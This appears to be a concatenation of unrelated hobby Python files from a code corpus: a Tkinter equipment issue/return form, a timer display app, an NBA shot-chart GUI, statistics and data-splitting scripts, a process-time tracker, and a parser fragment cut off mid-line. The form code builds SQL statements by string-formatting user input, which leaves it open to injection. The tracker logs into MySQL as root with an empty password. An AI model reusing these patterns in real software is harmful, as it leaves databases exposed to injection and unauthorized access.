if max_ICPC2 >= ICPC - 0.0001 and min_ICPC2 <= ICPC + 0.0001:
possible_range_2nd.append(i1)
second = np.random.choice(possible_range_2nd)
if second == 0.0:
second = 0
if second == 1.0:
second = 1
remain_total = 1 - first - second
if remain_total == 1.0:
remain_total = 1
if remain_total == 0.0:
remain_total = 0
remain_ICPC = ICPC - cal_ICPC(first) - cal_ICPC(second)
for kk in range(0, int(np.round(remain_total*10000)+1)):
k = kk/10000
if k == 0.0:
k = 0
if k == 1.0:
k = 1
if cal_ICPC(k) + cal_ICPC(remain_total - k) <= remain_ICPC + 0.001 and cal_ICPC(k) + cal_ICPC(remain_total - k) >= remain_ICPC - 0.001:
third = k
forth = np.round(10000*(remain_total - third))/10000
if forth == 0.0:
forth = 0
if forth == 1.0:
forth = 1
break
switch = [third,forth]
t = np.random.choice([0,1])
third = switch[t]
forth = switch[int(1-t)]
return first,second,third,forth
def motif_results(ML, ICPC):
motif_table = []
for i in range(0, ML):
this = find_possible(ICPC)
motif_table.append(this)
return motif_table
| Zhongyihhh/CS412-Gene-Mutation-Detection | Step1_3.py | Step1_3.py | py | 2,262 | python | en | code | 0 | github-code | 13 |
20210567209 | import os
import random
import sys
import source.tokenization.tokenization as tokenization
def save_data(data, label, meta, path, name):
print(path)
foutd = open(path + name + "_remadd.txt", 'w', encoding='utf-8', errors='ignore')
for i, d in enumerate(data):
foutd.write(" ".join(d).replace('\n', '').replace('\t', '') +
'\t' + " ".join(label[i]).replace('\n', '').replace('\t', '') + '\n')
foutm = open(path + name + "_meta.txt", 'w', encoding='utf-8', errors='ignore')
for m in meta:
foutm.write(m + '\n')
# https://stackoverflow.com/questions/23289547/shuffle-two-list-at-once-with-same-order
def unison_shuffled_copies(a, b, c):
try:
assert len(a) == len(b)
assert len(a) == len(c)
d = list(zip(a, b, c))
random.shuffle(d)
a, b, c = zip(*d)
return a, b, c
except:
print("Error: Files with different length")
print(len(a))
print(len(b))
print(len(c))
sys.exit()
def get_training_testing(data, labels, meta_list, valid_size=20000, test_size=20000, shuffle=False):
"""
Split the data between, training, valid and test set. Shuffled for training
:param data:
:param labels:
:param meta_list:
:param valid_size:
:param test_size:
:param shuffle:
:return:
"""
if shuffle:
data, labels, meta_list = unison_shuffled_copies(data, labels, meta_list)
train_data = data[:-(test_size + valid_size)]
train_labels = labels[:-(test_size + valid_size)]
train_meta = meta_list[:-(test_size + valid_size)]
valid_data = data[-(test_size + valid_size):-test_size]
valid_labels = labels[-(test_size + valid_size):-test_size]
valid_meta = meta_list[-(test_size + valid_size):-test_size]
test_data = data[-test_size:]
test_labels = labels[-test_size:]
test_meta = meta_list[-test_size:]
return ([train_data, train_labels, train_meta],
[valid_data, valid_labels, valid_meta],
[test_data, test_labels, test_meta])
def main_nocontext(init_dir):
"""
Parse and clean data without context.
:param init_dir: dir with the original training data.
:return:
"""
saved_data_path = init_dir + "/../nocontext/train/"
print("Save data in :", saved_data_path)
# Check if path exist
if not os.path.exists(saved_data_path):
os.makedirs(saved_data_path)
rem_path = os.path.join(init_dir, 'rem.txt')
add_path = os.path.join(init_dir, 'add.txt')
meta_path = os.path.join(init_dir, 'meta.txt')
rem_lines = open(rem_path).read().split('\n')
add_lines = open(add_path).read().split('\n')
meta_lines = open(meta_path).read().split('\n')
rem_toks = [tokenization.tokenize(line) for line in rem_lines]
add_toks = [tokenization.tokenize(line) for line in add_lines]
[train_data, train_labels, train_meta], \
[valid_data, valid_labels, valid_meta], \
[test_data, test_labels, test_meta] = get_training_testing(rem_toks, add_toks,
meta_lines,
shuffle=True)
save_data(train_data, train_labels, train_meta, saved_data_path, '_train')
save_data(valid_data, valid_labels, valid_meta, saved_data_path, '_valid')
save_data(test_data, test_labels, test_meta, saved_data_path, '_test')
def main_context(init_dir):
"""
Parse and clean data with context.
:param init_dir:
:return:
"""
saved_data_path = init_dir + "/../context/train/"
print("Save data in :", saved_data_path)
# Check if path exist
if not os.path.exists(saved_data_path):
os.makedirs(saved_data_path)
rem_path = os.path.join(init_dir, 'rem.txt')
add_path = os.path.join(init_dir, 'add.txt')
context_path = os.path.join(init_dir, 'context.txt')
meta_path = os.path.join(init_dir, 'meta.txt')
rem_lines = open(rem_path).read().split('\n')
add_lines = open(add_path).read().split('\n')
context_lines = open(context_path).read().split('\n')
meta_lines = open(meta_path).read().split('\n')
rem_toks = []
rem_toks_init = [tokenization.tokenize(line) for line in rem_lines]
add_toks = [tokenization.tokenize(line) for line in add_lines]
context_toks = [tokenization.tokenize(line) for line in context_lines]
print(rem_toks_init[0])
print("CONTEXT")
print(context_toks[0])
for i in range(0, len(rem_toks_init)):
try:
if context_toks[i] and rem_toks_init[i]:
rem_toks.append(rem_toks_init[i] + ['<CTX>'] + context_toks[i])
elif rem_toks_init[i]:
rem_toks.append(rem_toks_init[i])
elif context_toks[i]:
rem_toks.append(['<CTX>'] + context_toks[i])
else:
rem_toks.append([" "])
except:
continue
[train_data, train_labels, train_meta], \
[valid_data, valid_labels, valid_meta], \
[test_data, test_labels, test_meta] = get_training_testing(rem_toks, add_toks,
meta_lines,
shuffle=True)
save_data(train_data, train_labels, train_meta, saved_data_path, '_train')
save_data(valid_data, valid_labels, valid_meta, saved_data_path, '_valid')
save_data(test_data, test_labels, test_meta, saved_data_path, '_test')
def main(data_dir, context):
print("Start tokenizing: ", context)
if context == "context":
main_context(data_dir)
if context == "nocontext":
print("Nocontext")
main_nocontext(data_dir)
main(sys.argv[1], sys.argv[2])
| lin-tan/CoCoNut-Artifact | source/tokenization/generate_data.py | generate_data.py | py | 5,770 | python | en | code | 48 | github-code | 13 |
3848241398 | import json
from dataclasses import dataclass
from datetime import datetime, timezone
import time
from ulanzi import UlanziApp
BAR_COLOR_PAUSED = '#deb764'
BAR_COLOR_RUNNING = '#aadb72'
BAR_COLOR_BG = '#373a40'
class UlanziTimerDisplay(UlanziApp):
"""
App that listens to HASS timer events and dynamically displays them
"""
TIMER_STARTED = 'timer.started'
TIMER_FINISHED = 'timer.finished'
TIMER_CANCELLED = 'timer.cancelled'
TIMER_PAUSED = 'timer.paused'
TIMER_RESTARTED = 'timer.restarted'
@dataclass
class Timer:
status: str
remaining: int
total: int
icon: str
def get_output(self):
if self.remaining >= 3600:
text = time.strftime('%-H:%M:%S', time.gmtime(self.remaining))
else:
text = time.strftime('%-M:%S', time.gmtime(max(0, self.remaining)))
result = {
'icon': self.icon,
'text': text,
'progressBC': BAR_COLOR_BG,
'progressC': BAR_COLOR_RUNNING if self.status == 'running' else BAR_COLOR_PAUSED,
'progress': int(100 - (self.remaining / self.total * 100)),
}
if self.remaining < 30:
result['duration'] = 30
return result
def initialize(self):
super().initialize()
self.timers = {}
self.tick_timer_handle = None
try:
self.custom_icons = self.args.get('custom_icons', {})
self.ignore_timers = self.args.get('ignore', [])
except KeyError as err:
self.error("Failed getting configuration {}".format(err.args[0]))
return
timer_events = [
UlanziTimerDisplay.TIMER_STARTED,
UlanziTimerDisplay.TIMER_FINISHED,
UlanziTimerDisplay.TIMER_CANCELLED,
UlanziTimerDisplay.TIMER_PAUSED,
UlanziTimerDisplay.TIMER_RESTARTED,
]
self.listen_event(self.trigger, timer_events)
def _get_seconds_until(self, timestamp):
"""Get the amount of seconds until the given timestamp"""
now = datetime.now(timezone.utc)
then = datetime.fromisoformat(timestamp)
return int((then - now).total_seconds())
def trigger(self, event_name, data, kwargs):
self.log(f"Received event {event_name}: {data}")
timer_id = data['entity_id']
timer_name = timer_id.split('.')[-1]
if timer_id in self.ignore_timers or timer_name in self.ignore_timers:
return
timer = self.get_state(timer_id, attribute='all')
icon = self.custom_icons.get(timer_name, self.icon)
if event_name in (UlanziTimerDisplay.TIMER_STARTED):
self.timers[timer_id] = UlanziTimerDisplay.Timer(
status='running',
remaining=self._get_seconds_until(timer['attributes']['finishes_at']),
total=self._get_seconds_until(timer['attributes']['finishes_at']),
icon=icon,
)
else:
obj = self.timers.get(timer_id)
if obj is None:
self.log(f"Received event {event_name} for unknown timer {timer_id}")
return
if event_name == UlanziTimerDisplay.TIMER_RESTARTED:
obj.remaining = self._get_seconds_until(timer['attributes']['finishes_at']) + 1
obj.status = 'running'
elif event_name == UlanziTimerDisplay.TIMER_FINISHED:
del self.timers[timer_id]
timer_name = timer['attributes']['friendly_name']
self.send_notification(f"{timer_name} ist fertig!", icon=icon)
elif event_name == UlanziTimerDisplay.TIMER_CANCELLED:
del self.timers[timer_id]
elif event_name == UlanziTimerDisplay.TIMER_PAUSED:
obj.status = 'paused'
if not self.timers:
self.delete_app()
self.cancel_timer(self.tick_timer_handle)
self.tick_timer_handle = None
elif self.tick_timer_handle is None:
self.tick_timer_handle = self.run_every(self.tick, 'now', 1)
def tick(self, *args, **kwargs):
app_pages = []
for timer in self.timers.values():
if timer.status == 'running':
timer.remaining -= 1
app_pages.append(timer.get_output())
self.call_service('mqtt/publish', topic=self.mqtt_app_topic, payload=json.dumps(app_pages))
| ict/ulanzi-awtrix-appdaemon | ustopwatch.py | ustopwatch.py | py | 4,535 | python | en | code | 1 | github-code | 13 |
34129706092 | from src.dependencies.imports import *
class Item_issue(LabelFrame):
def __init__(self,master,db):
super(Item_issue,self).__init__(master)
self.grid()
labelfont=('times',16,'bold')
self.config(bd=10,bg="#bdc3c7",font=labelfont)
self.master=master
self.depts=self.master.depts
self.machines=[]
self.db=db
self.create_widgets()
def create_widgets(self):
row=0;
self.config(text="Item Issue/Return Details",
relief=FLAT,
labelanchor=N,
padx=30,
pady=10)
textfont=('verdana',10)
errorfont=('verdana',8)
Label(self,text="Type: ",
font=textfont,bg="#bdc3c7").grid(row=row,
column=0,
sticky=N+S+W+E)
self.iss_type=BooleanVar()
self.iss_type.set(False)
Radiobutton(self,text="Issue",
font=textfont,bg="#bdc3c7",
variable=self.iss_type,
command=self.issue_form,
value=True).grid(row=row,column=1,
sticky=W)
self.ret_type=BooleanVar()
self.ret_type.set(False)
Radiobutton(self,text="Return",
font=textfont,bg="#bdc3c7",
variable=self.ret_type,
command=self.return_form,
value=True).grid(row=row,column=2,
sticky=W)
row+=1
self.type_err=StringVar()
self.type_err.set("")
Label(self,textvariable=self.type_err,
font=errorfont,
fg="red",bg="#bdc3c7").grid(row=row,
column=1,
columnspan=2,
sticky=W+E)
row+=1
Label(self,text="Machine ID: ",
font=textfont,bg="#bdc3c7").grid(row=row,
column=0,
sticky=N+S+W+E)
self.id=StringVar();
self.id.set("")
self.id_opt=combo(self,self.machines,self.id,True)
self.id_opt.grid(row=row,column=1,sticky=W+E)
for chl in self.id_opt.children.values():
chl.bind('<Control-space>',self.new_equipment)
self.fetch=Button(self,text="Fetch",fg="white",
bg="#34495e",font=textfont,
command=self.item_return,width=8,
state=DISABLED)
self.fetch.grid(row=row,
column=2,
sticky=E)
row+=1
self.id_err=StringVar()
self.id_err.set("")
Label(self,textvariable=self.id_err,
font=errorfont,
fg="red",bg="#bdc3c7").grid(row=row,
column=1,
columnspan=2,
sticky=W+E)
row+=1
Label(self,text="Issue Date: ",
font=textfont,bg="#bdc3c7").grid(row=row,
column=0,
sticky=N+S+W+E)
self.issue=Entry(self,
state=DISABLED)
self.issue.grid(row=row,
column=1,
sticky=W+E)
self.issue_select=Button(self,text="Calendar",fg="white",
bg="#34495e",font=textfont,
command=self.selectdate,width=8,
state=DISABLED)
self.issue_select.grid(row=row,
column=2,
sticky=E)
row+=1
self.issue_err=StringVar()
self.issue_err.set("")
Label(self,textvariable=self.issue_err,
font=errorfont,
fg="red",bg="#bdc3c7").grid(row=row,
column=1,
columnspan=2,
sticky=W+E)
row+=1
Label(self,text="Issued by: ",
font=textfont,bg="#bdc3c7").grid(row=row,
column=0,
sticky=N+S+W+E)
self.issby=Entry(self,
state=DISABLED);
self.issby.grid(row=row,column=1,columnspan=2,sticky=W+E)
row+=1
self.issby_err=StringVar()
self.issby_err.set("")
Label(self,textvariable=self.issby_err,
font=errorfont,
fg="red",bg="#bdc3c7").grid(row=row,
column=1,
columnspan=2,
sticky=W+E)
row+=1
Label(self,text="Issued to: ",
font=textfont,bg="#bdc3c7").grid(row=row,
column=0,
sticky=N+S+W+E)
self.issto=Entry(self,
state=DISABLED);
self.issto.grid(row=row,column=1,columnspan=2,sticky=W+E)
row+=1
self.issto_err=StringVar()
self.issto_err.set("")
Label(self,textvariable=self.issto_err,
font=errorfont,
fg="red",bg="#bdc3c7").grid(row=row,
column=1,
columnspan=2,
sticky=W+E)
row+=1
Label(self,text="Return Date: ",
font=textfont,bg="#bdc3c7").grid(row=row,
column=0,
sticky=N+S+W+E)
self.ret=Entry(self,
state=DISABLED)
self.ret.grid(row=row,
column=1,
sticky=W+E)
self.ret_select=Button(self,text="Calendar",fg="white",
bg="#34495e",font=textfont,
command=self.selectdate,width=8,
state=DISABLED)
self.ret_select.grid(row=row,
column=2,
sticky=E)
row+=1
self.ret_err=StringVar()
self.ret_err.set("")
Label(self,textvariable=self.ret_err,
font=errorfont,
fg="red",bg="#bdc3c7").grid(row=row,
column=1,
columnspan=2,
sticky=W+E)
row+=1
Label(self,text="Returned to: ",
font=textfont,bg="#bdc3c7").grid(row=row,
column=0,
sticky=N+S+W+E)
self.retto=Entry(self,
state=DISABLED);
self.retto.grid(row=row,column=1,columnspan=2,sticky=W+E)
row+=1
self.retto_err=StringVar()
self.retto_err.set("")
Label(self,textvariable=self.retto_err,
font=errorfont,
fg="red",bg="#bdc3c7").grid(row=row,
column=1,
columnspan=2,
sticky=W+E)
row+=1
Label(self,text="Returned on: ",
font=textfont,bg="#bdc3c7").grid(row=row,
column=0,
sticky=N+S+W+E)
self.reton=Entry(self,
state=DISABLED)
self.reton.grid(row=row,
column=1,
sticky=W+E)
self.reton_select=Button(self,text="Calendar",fg="white",
bg="#34495e",font=textfont,
command=self.selectdate,width=8,
state=DISABLED)
self.reton_select.grid(row=row,
column=2,
sticky=E)
row+=1
self.reton_err=StringVar()
self.reton_err.set("")
Label(self,textvariable=self.reton_err,
font=errorfont,
fg="red",bg="#bdc3c7").grid(row=row,
column=1,
columnspan=2,
sticky=W+E)
row+=1
Label(self,text="Remarks: ",
font=textfont,bg="#bdc3c7").grid(row=row,
column=0,
sticky=N+S+W+E)
self.rem=Text(self,width=40,height=5,wrap=WORD)
self.rem.grid(row=row,column=1,columnspan=2,sticky=W+E)
row+=1
Button(self,text="SUBMIT",bg="#34495e",font=textfont,
command=self.submit,fg="white",
width=12).grid(row=row,
column=1,
pady=15)
Button(self,text="RESET",bg="#34495e",font=textfont,
command=self.reset,fg="white",
width=12).grid(row=row,
column=2,
pady=15)
self.pack(anchor=CENTER,expand=1)
def selectdate(self):
X=__import__('calendar_ui')
self.expiry_date=X.CalendarWidget(self.master)
#self.expire.insert(0,self.expiry_date.selection())
def new_equipment(self,event):
self.pack_forget()
X=__import__("src.dependencies.Equipment",fromlist=('Equipment'))
self.z=X.Equipment(self.master,self.db,False)
t=Thread(target=self.call_pack,args=())
t.setDaemon(True)
t.start()
def call_pack(self):
try:
while self.z.winfo_exists():
sleep(0.1)
pass
self.pack(anchor=CENTER,expand=1)
except:
pass
def item_return(self):
self.db.connect()
cur=self.db.execute_sql("""select * from item_issue
where machine_id='%s' and issue='1';"""
%(self.id.get()))
data=list(cur.fetchall())
self.issue.config(state=NORMAL)
self.issby.config(state=NORMAL)
self.issto.config(state=NORMAL)
self.ret.config(state=NORMAL)
self.issue.insert(0,data[0][2])
self.issby.insert(0,data[0][3])
self.issto.insert(0,data[0][4])
self.ret.insert(0,data[0][5])
self.rem.insert("1.0",data[0][8])
self.issue.config(state=DISABLED)
self.issby.config(state=DISABLED)
self.issto.config(state=DISABLED)
self.ret.config(state=DISABLED)
self.db.close()
def issue_form(self):
self.machines=[]
dpt=[]
for items in self.depts:
tmp=(items.split(" - "))
dpt.append(tmp[0])
if len(dpt)==1:
dpt="("+dpt[0]+")"
else:
dpt=str(tuple(dpt))
x=self.db.execute_sql("""select machine from equipment
where issuable='1'
and department in %s;"""%(dpt))
z=list(x.fetchall())
for mach in z:
self.machines.append(mach[0])
x=self.db.execute_sql("""select machine_id from item_issue
where issue='1';""")
z=list(x.fetchall())
for mach in z:
self.machines.remove(mach[0])
self.id_opt.value_config(self.machines)
self.id.set("")
self.ret_type.set(False)
self.issue.config(state=NORMAL)
self.issto.config(state=NORMAL)
self.issby.config(state=NORMAL)
self.ret.config(state=NORMAL)
self.issue_select.config(state=NORMAL)
self.ret_select.config(state=NORMAL)
self.issue.delete(0,END)
self.issby.delete(0,END)
self.issto.delete(0,END)
self.ret.delete(0,END)
self.rem.delete("1.0",END)
self.retto.delete(0,END)
self.retto.config(bg="white",state=DISABLED)
self.retto_err.set("")
self.reton.delete(0,END)
self.reton.config(bg="white",state=DISABLED)
self.reton_err.set("")
self.reton_select.config(state=DISABLED)
self.fetch.config(state=DISABLED)
def return_form(self):
self.machines=[]
cur=self.db.execute_sql("""select machine_id from item_issue
where issue='1';""")
z=list(cur.fetchall())
for mach in z:
self.machines.append(mach[0])
self.id_opt.value_config(self.machines)
self.id.set("")
self.iss_type.set(False)
self.issue.delete(0,END)
self.issue.config(bg="white",state=DISABLED)
self.issue_err.set("")
self.issto.delete(0,END)
self.issto.config(bg="white",state=DISABLED)
self.issto_err.set("")
self.issby.delete(0,END)
self.issby.config(bg="white",state=DISABLED)
self.issby_err.set("")
self.issue_select.config(state=DISABLED)
self.ret_select.config(state=DISABLED)
self.ret.delete(0,END)
self.ret.config(bg="white",state=DISABLED)
self.ret_err.set("")
self.retto.config(state=NORMAL)
self.reton.config(state=NORMAL)
self.reton_select.config(state=NORMAL)
self.fetch.config(state=NORMAL)
def submit(self):
comp=BooleanVar()
comp.set(True)
msg=StringVar()
if not self.iss_type.get() and not self.ret_type.get():
self.type_err.set("Select Type")
comp.set("False")
else:
self.type_err.set("")
comp.set("True")
if self.iss_type.get():
msg.set("This field cannot be empty")
check_ent(self.issby,comp,msg,self.issby_err)
msg.set("This field cannot be empty")
check_ent(self.issto,comp,msg,self.issto_err)
msg.set("Invalid Issue Date")
check_date(self.issue,comp,msg,self.issue_err)
msg.set("Invalid Return Date")
check_date(self.ret,comp,msg,self.ret_err)
msg.set("Return date should be after Issue date")
comp_date(self.issue,self.ret,comp,msg,self.ret_err)
if self.ret_type.get():
msg.set("This field cannot be empty")
check_date(self.reton,comp,msg,self.reton_err)
msg.set("This field cannot be empty")
check_ent(self.retto,comp,msg,self.retto_err)
msg.set("Machine ID cannot be empty")
check_stvar(self.id,self.machines,comp,msg,self.id_err)
try:
self.db.connect()
if comp.get():
if self.iss_type.get():
self.db.execute_sql("""insert into item_issue
values(%d,'%s','%s','%s','%s','%s',NULL,NULL,'%s');"""
%(self.iss_type.get(),
self.id.get(),
self.issue.get(),
self.issby.get(),
self.issto.get(),
self.ret.get(),
self.rem.get("1.0",END)
))
else:
self.db.execute_sql("""update item_issue
set issue=%d,return_on='%s',ret_accepted_by='%s',remark='%s'
where machine_id='%s' and issue='%s';"""
%(self.iss_type.get(),
self.reton.get(),
self.retto.get(),
self.rem.get("1.0",END),
self.id.get(),
self.ret_type.get()
))
self.reset()
except pw.IntegrityError as e:
print(e)
except:
self.db.close()
print("Connection error")
def reset(self):
self.destroy()
Item_issue(self.master,self.db)
| SohailChamadia/Digital-Assets | src/dependencies/Item_issue.py | Item_issue.py | py | 17,273 | python | en | code | 1 | github-code | 13 |
14917171951 | import plotly.figure_factory as ff
import pandas as pd
import csv
import plotly.graph_objects as go
import statistics
import random
data = pd.read_csv("StudentsPerformance.csv")
finalData = data["reading score"].tolist()
mean = sum(finalData) / len(finalData)
std_dev = statistics.stdev(finalData)
median = statistics.median(finalData)
mode = statistics.mode(finalData)
first_std_dev_start, first_std_dev_end = mean-std_dev, mean+std_dev
second_std_dev_start, second_std_dev_end = mean-(2*std_dev), mean+(2*std_dev)
third_std_dev_start, third_std_dev_end = mean-(3*std_dev), mean+(3*std_dev)
fig = ff.create_distplot([finalData], ["reading scores"], show_hist=False)
fig.show()
list_of_data_within_1_std_dev = [result for result in finalData if result > first_std_dev_start and result < first_std_dev_end]
list_of_data_within_2_std_dev = [result for result in finalData if result > second_std_dev_start and result < second_std_dev_end]
list_of_data_within_3_std_dev = [result for result in finalData if result > third_std_dev_start and result < third_std_dev_end]
print("Mean of this data is {}".format(mean))
print("Median of this data is {}".format(median))
print("Mode of this data is {}".format(mode))
print("Standard deviation of this data is {}".format(std_dev))
print("{}% of data lies within 1 standard deviation".format(len(list_of_data_within_1_std_dev)*100.0/len(finalData)))
print("{}% of data lies within 2 standard deviations".format(len(list_of_data_within_2_std_dev)*100.0/len(finalData)))
print("{}% of data lies within 3 standard deviations".format(len(list_of_data_within_3_std_dev)*100.0/len(finalData))) | Asaawari/Properties-of-Normal-Distribution | code.py | code.py | py | 1,660 | python | en | code | 0 | github-code | 13 |
71040828497 | from tkinter import *
from tkinter import filedialog
from nba_api.stats.endpoints import shotchartdetail
import json
import requests
import pandas as pd
import matplotlib as mpl
import matplotlib.pyplot as plt
import customtkinter
# Load teams file
teams = json.loads(requests.get('https://raw.githubusercontent.com/bttmly/nba/master/data/teams.json').text)
# Load players file
players = json.loads(requests.get('https://raw.githubusercontent.com/bttmly/nba/master/data/players.json').text)
# Get team ID based on team name
def get_team_id(team_name):
for team in teams:
if team['teamName'] == team_name:
return team['teamId']
return -1
# Get player ID based on player name
def get_player_id(first, last):
for player in players:
if player['firstName'] == first and player['lastName'] == last:
return player['playerId']
return -1
def create_court(ax, color):
# Short corner 3PT lines
ax.plot([-220, -220], [0, 140], linewidth=2, color=color)
ax.plot([220, 220], [0, 140], linewidth=2, color=color)
# 3PT Arc
ax.add_artist(mpl.patches.Arc((0, 140), 440, 315, theta1=0, theta2=180, facecolor='none', edgecolor=color, lw=2))
# Lane and Key
ax.plot([-80, -80], [0, 190], linewidth=2, color=color)
ax.plot([80, 80], [0, 190], linewidth=2, color=color)
ax.plot([-60, -60], [0, 190], linewidth=2, color=color)
ax.plot([60, 60], [0, 190], linewidth=2, color=color)
ax.plot([-80, 80], [190, 190], linewidth=2, color=color)
ax.add_artist(mpl.patches.Circle((0, 190), 60, facecolor='none', edgecolor=color, lw=2))
# Rim
ax.add_artist(mpl.patches.Circle((0, 60), 15, facecolor='none', edgecolor=color, lw=2))
# Backboard
ax.plot([-30, 30], [40, 40], linewidth=2, color=color)
# Remove ticks
ax.set_xticks([])
ax.set_yticks([])
# Set axis limits
ax.set_xlim(-250, 250)
ax.set_ylim(0, 470)
return ax
def create_plot():
# Get user input from GUI
player_name = player_name_entry.get()
team_name = team_name_entry.get()
year = year_entry.get()
# Get player ID
first, last = player_name.split()
player_id = get_player_id(first, last)
# Create JSON request
shot_json = shotchartdetail.ShotChartDetail(
team_id=get_team_id(team_name),
player_id=player_id,
context_measure_simple='PTS',
season_nullable=year,
season_type_all_star='Regular Season')
shot_data = json.loads(shot_json.get_json())
relevant_data = shot_data['resultSets'][0]
headers = relevant_data['headers']
rows = relevant_data['rowSet']
# Create pandas DataFrame
player_data = pd.DataFrame(rows)
player_data.columns = headers
mpl.rcParams['font.family'] = 'Avenir'
mpl.rcParams['font.size'] = 18
mpl.rcParams['axes.linewidth'] = 2
# Create figure and axes
fig = plt.figure(figsize=(4, 3.76))
ax = fig.add_axes([0, 0, 1, 1])
ax.set_title(f"{player_name} ({year}) Stats")
# Draw court
ax = create_court(ax, 'black')
# Plot hexbin of shots
ax.hexbin(player_data['LOC_X'], player_data['LOC_Y'] + 60, gridsize=(30, 30), extent=(-300, 300, 0, 940), bins='log', cmap='Reds')
# Annotate player name and season
ax.text(0, 1.05, f'{player_name}\n{year} Regular Season', transform=ax.transAxes, ha='left', va='baseline')
# save the figure with a filename based on the player name and year
filename = f"{player_name}_{year}_stats.png"
fig.savefig(filename)
plt.show()
# Create a tkinter window
root = customtkinter.CTk()
root.title("NBA Shot Chart")
root.geometry(f"{500}x{250}")
# Create input fields and labels
player_name_label = customtkinter.CTkLabel(root, text="Player Name (First Last): ")
player_name_label.grid(row=1, column=0, pady=10)
player_name_entry = customtkinter.CTkEntry(root)
player_name_entry.grid(row=1, column=1, ipadx="100", pady=10)
team_name_label = customtkinter.CTkLabel(root, text="Team (Name City): ")
team_name_label.grid(row=2, column=0, pady=10)
team_name_entry = customtkinter.CTkEntry(root)
team_name_entry.grid(row=2, column=1, ipadx="100", pady=10)
year_label = customtkinter.CTkLabel(root, text="Year (YYYY-YY): ")
year_label.grid(row=3,column=0, pady=10)
year_entry = customtkinter.CTkEntry(root)
year_entry.grid(row=3, column=1, ipadx="100", pady=10)
# Create a button to trigger data retrieval and visualization
visualize_button = customtkinter.CTkButton(root, text="Generate Shot Chart", command=create_plot)
visualize_button.grid(row=4,column=1, pady=10)
# Start the tkinter main loop
root.mainloop() | eramadani3/NBA-Analysis-Tool | Analysis/shotChart.py | shotChart.py | py | 4,624 | python | en | code | 0 | github-code | 13 |
16080882005 | """
Created on Wed Feb 17 11:25:2503 2021
@author: Sule
@name: command_line.py
@description: ->
DOCSTRING:
"""
#!/usr/bin/env python3
# Importing the libraries
from threading import Timer
from sys import exit
from datetime import datetime
import wmi
import pythoncom
import mysql.connector
class Process():
"""
DOCSTRING:
"""
def __init__(self, id, name, caption, type, date, daily, monthly, yearly, all_time):
"""
DOCSTRING:
"""
self.id = id
self.name = name
self.caption = caption
self.type = type
self.date = date
self.daily = daily
self.monthly = monthly
self.yearly = yearly
self.all_time = all_time
self.time_started = datetime.now()
self.active = False
def check_date(self, mydb, mycursor):
"""
DOCSTRING:
"""
today = datetime.now()
if today.day != self.date.day:
self.daily = 0
if today.month != self.date.month:
self.monthly = 0
if today.year != self.date.year:
self.yearly = 0
sql = "UPDATE apps SET daily=%s, monthly=%s, yearly=%s WHERE id=%s"
val = (self.daily, self.monthly, self.yearly, self.id, )
mycursor.execute(sql, val)
mydb.commit()
class App():
"""
DOCSTRING:
"""
def __init__(self, mydb, mycursor):
"""
DOCSTRING:
"""
self.mydb = mydb
self.mycursor = mycursor
self.caption_list = self.get_captions_from_db()
self.process_list = self.get_processes_from_db()
self.check_date()
def check_date(self):
"""
DOCSTRING:
"""
for process in self.process_list:
process.check_date(self.mydb, self.mycursor)
def get_captions_from_db(self):
"""
DOCSTRING:
"""
caption_list = {}
self.mycursor.execute("SELECT id, caption FROM apps")
result = self.mycursor.fetchall()
for row in result:
caption_list[row[1]] = row[0]
return caption_list
def get_processes_from_db(self):
"""
DOCSTRING:
"""
process_list = []
self.mycursor.execute("SELECT * FROM apps")
result = self.mycursor.fetchall()
for row in result:
process = Process(row[0], row[1], row[2], row[3], row[4], row[5], row[6], row[7], row[8])
process_list.append(process)
return process_list
def check_for_change(self):
"""
DOCSTRING:
"""
c = wmi.WMI()
active_list = [x for x in self.process_list if x.active]
inactive_list = [x for x in self.process_list if not x.active]
for tmp in self.process_list:
tmp.active = False
for process in c.Win32_Process(["Caption"]):
if process.Caption in self.caption_list:
id = self.caption_list[process.Caption] - 1
current_proc = self.process_list[id]
if not current_proc.active:
current_proc.active = True
for tmp in active_list:
if not self.process_list[tmp.id-1].active:
self.process_shutdown(tmp)
for tmp in inactive_list:
if self.process_list[tmp.id-1].active:
self.process_start(tmp)
return [x for x in self.process_list if x.active], [x for x in self.process_list if not x.active]
def process_start(self, process):
"""
DOCSTRING:
"""
process.time_started = datetime.now()
print(f'[+] Starting {process.name}...')
def process_shutdown(self, process):
"""
DOCSTRING:
"""
time_finished = datetime.now()
duration = int((time_finished - process.time_started).total_seconds())
date = datetime.now()
process.daily += duration
process.monthly += duration
process.yearly += duration
process.all_time += duration
sql = "UPDATE apps SET date=%s, daily=%s, monthly=%s, yearly=%s, all_time=%s WHERE id=%s"
val = (date, process.daily, process.monthly, process.yearly, process.all_time, process.id, )
self.mycursor.execute(sql, val)
self.mydb.commit()
print(f'[-] Shuting down {process.name}... ({duration}s)')
def run(self):
"""
DOCSTRING:
"""
pythoncom.CoInitialize()
active_list, inactive_list = self.check_for_change()
timer = Timer(9.0, self.run)
timer.start()
def main():
"""
DOCSTRING:
"""
try:
mydb = mysql.connector.connect(
host='localhost',
user='root',
passwd='',
database='process_watcher'
)
mycursor = mydb.cursor()
except mysql.connector.errors.InterfaceError:
print('[-] Cant connect to DB.')
exit()
app = App(mydb, mycursor)
app.run()
if __name__ == '__main__':
main()
| nikola-supic/process_watcher | command_line.py | command_line.py | py | 5,073 | python | en | code | 0 | github-code | 13 |
15805245776 | import argparse
from tools.tools import *
if __name__ == "__main__":
print('''
__
______ ____ ____ | | __
/ ___// __ \_/ __ \| |/ /
\___ \\\\ ___/\ ___/| <
/____ >\___ >\___ >__|_ \\
\/ \/ \/ \/
version 1.0.2
auhtor: iami233
''')
description = "此工具允许您执行与IP和域名相关的操作,包括同IP站点查找和域名信息查询。\nExample: python main.py -file assets.txt"
parser = argparse.ArgumentParser(description=description, formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument("-file", dest="file_path", help="Path to the assets file")
args = parser.parse_args()
try:
data = process_assets(args.file_path)
except:
parser.print_help() | 5ime/Seek | seek.py | seek.py | py | 815 | python | en | code | 12 | github-code | 13 |
35921111405 | import json
from anytree import Node, RenderTree
from scanner import Scanner
class Parser:
def __init__(self, scanner: Scanner, grammar_json) -> None:
self.scanner = scanner
grammar = json.load(open(grammar_json))
self.terminals = grammar['terminals']
self.non_terminals = grammar['non_terminals']
self.first = grammar['first']
self.follow = grammar['follow']
self.grammar = grammar['grammar']
self.parse_table = grammar['parse_table']
self.stack_state = ["0"]
self.stack_token = []
self.token = [None, None]
self.action = "shift"
self.root = None
self.nodes = []
self.error = False
self.err_string = ""
def parse(self):
while (self.action != "accept"):
if self.token[0] is None:
token, string = self.scanner.get_next_token()
self.token = [token, string]
self.token[0] = string if token in [
